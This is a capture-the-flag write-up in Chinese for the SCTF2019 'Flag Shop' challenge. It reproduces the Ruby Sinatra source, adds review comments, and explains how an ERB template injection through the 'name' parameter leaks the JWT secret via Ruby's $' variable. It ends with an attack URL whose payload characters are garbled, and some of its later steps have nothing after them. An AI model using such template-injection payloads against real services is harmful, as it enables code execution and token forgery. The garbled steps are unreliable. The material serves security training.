[SCTF2019]Flag Shop
解题
-
访问 robots.txt 可以看到 /static/secretkey.txt,但源码其实是从 /filebak 拿到的,原因不清楚。
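# Challenge application source as returned by /filebak, restored to one
# statement per line. The fused "ruby" fence label was dropped and the
# truncated final `en` was restored to `end`; the logic is unchanged.
# NOTE(review) comments mark the security-relevant lines.
require 'sinatra'
require 'sinatra/cookies'
require 'sinatra/json'
require 'jwt'
require 'securerandom'
require 'erb'

set :public_folder, File.dirname(__FILE__) + '/static'

# Price of the flag in "jkl"; /api/auth hands out 20 and /work adds at most 9 per call.
FLAGPRICE = 1000000000000000000000000000
# HS256 signing key for the auth cookie, regenerated on every process start.
ENV["SECRET"] = SecureRandom.hex(64)

configure do
  enable :logging
  # Request log is appended to ../log/http.log; sync = true disables buffering.
  file = File.new(File.dirname(__FILE__) + '/../log/http.log',"a+")
  file.sync = true
  use Rack::CommonLogger, file
end

get "/" do
  redirect '/shop', 302
end

# NOTE(review): this route returns the application's own source to any client,
# with no login check. It also passes the file contents to `erb` as template
# text rather than sending them as plain data. A backup/debug route like this
# should not exist in a deployed service.
get "/filebak" do
  content_type :text
  erb IO.binread __FILE__
end

# Issues a fresh signed token: random uid, starting balance of 20 jkl.
get "/api/auth" do
  payload = { uid: SecureRandom.uuid , jkl: 20}
  auth = JWT.encode payload,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
end

# Returns uid and balance from the verified token (third argument `true`
# turns on signature verification, pinned to HS256).
get "/api/info" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  json({uid: auth[0]["uid"],jkl: auth[0]["jkl"]})
end

get "/shop" do
  erb :shop
end

get "/work" do
  islogin
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }
  # JWT.decode returns [payload, header]; keep only the payload hash.
  auth = auth[0]
  unless params[:SECRET].nil?
    # NOTE(review): the request-supplied value (its first run of [0-9a-z],
    # or "" when there is none) is used as a *pattern* matched against the
    # signing secret. On success the flag only goes to the server's stdout,
    # but the match itself leaves data derived from the secret in Ruby's
    # last-match special variables. A secret check should be a fixed-length,
    # constant-time equality comparison (e.g. Rack::Utils.secure_compare),
    # never a regexp built from input.
    if ENV["SECRET"].match("#{params[:SECRET].match(/[0-9a-z]+/)}")
      puts ENV["FLAG"]
    end
  end

  # If `name` is absent, params[:name] is nil and the [0,7] slice raises
  # NoMethodError.
  if params[:do] == "#{params[:name][0,7]} is working" then
    auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    # NOTE(review): server-side template injection. The first 7 characters
    # of `name` are interpolated into the template *source* before ERB
    # compiles it, so ERB tags in the parameter are evaluated as Ruby on the
    # server. The slice limits length, not content. The same value is also
    # placed unescaped inside a <script> string. Keep the template constant
    # and pass the value in as escaped data instead.
    ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result
  end
end

post "/shop" do
  islogin
  # Here `auth` stays the full [payload, header] array.
  auth = JWT.decode cookies[:auth],ENV["SECRET"] , true, { algorithm: 'HS256' }

  if auth[0]["jkl"] < FLAGPRICE then
    json({title: "error",message: "no enough jkl"})
  else
    # The flag is appended to the decoded array and the whole array is
    # re-encoded as the new cookie. NOTE(review): HS256 signs the token but
    # does not encrypt it, so anything placed in it is readable by whoever
    # holds the cookie.
    auth << {flag: ENV["FLAG"]}
    auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
    cookies[:auth] = auth
    json({title: "success",message: "jkl is good thing"})
  end
end

# Redirects to /shop when no auth cookie is present. It only checks that the
# cookie exists; signature verification happens in each route's JWT.decode.
def islogin
  if cookies[:auth].nil? then
    redirect to('/shop')
  end
end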
-
源码是 Ruby 写的,并且用到了 ERB,所以思路是 Ruby 的 ERB 模板注入。
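# Excerpt from the /work route: the branch that builds an ERB template from
# the `name` request parameter. The fused "ruby" fence label was dropped and
# the closing `end` added so the excerpt parses on its own.
if params[:do] == "#{params[:name][0,7]} is working" then
  auth["jkl"] = auth["jkl"].to_i + SecureRandom.random_number(10)
  auth = JWT.encode auth,ENV["SECRET"] , 'HS256'
  cookies[:auth] = auth
  # NOTE(review): the first 7 characters of `name` are interpolated into the
  # template source before ERB compiles it, so ERB tags supplied in the
  # parameter are evaluated as Ruby on the server. The slice limits length,
  # not content. Keep the template constant and pass the value in as escaped
  # data instead.
  ERB::new("<script>alert('#{params[:name][0,7]} working successfully!')</script>").result
end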
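关键在于 secret 是怎样被输出的:Ruby 的预定义变量 $' 保存的是最近一次正则匹配成功后、位于匹配内容右侧的那部分字符串,而 /work 在前面刚用 ENV["SECRET"] 做过一次 match。name 的前 7 个字符会被拼进 ERB 模板并被求值,而 do 参数里的 " is working" 位于 ERB 标签之外,不会被当作 Ruby 代码解析,只用来通过字符串比较。因此可以利用这个 ERB 模板进行注入。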
所以传入/work?SECRET=&name=<%= ′ '%>&do=<%= ′'%>is working
得到:
构造后,
将jwt解码得到flag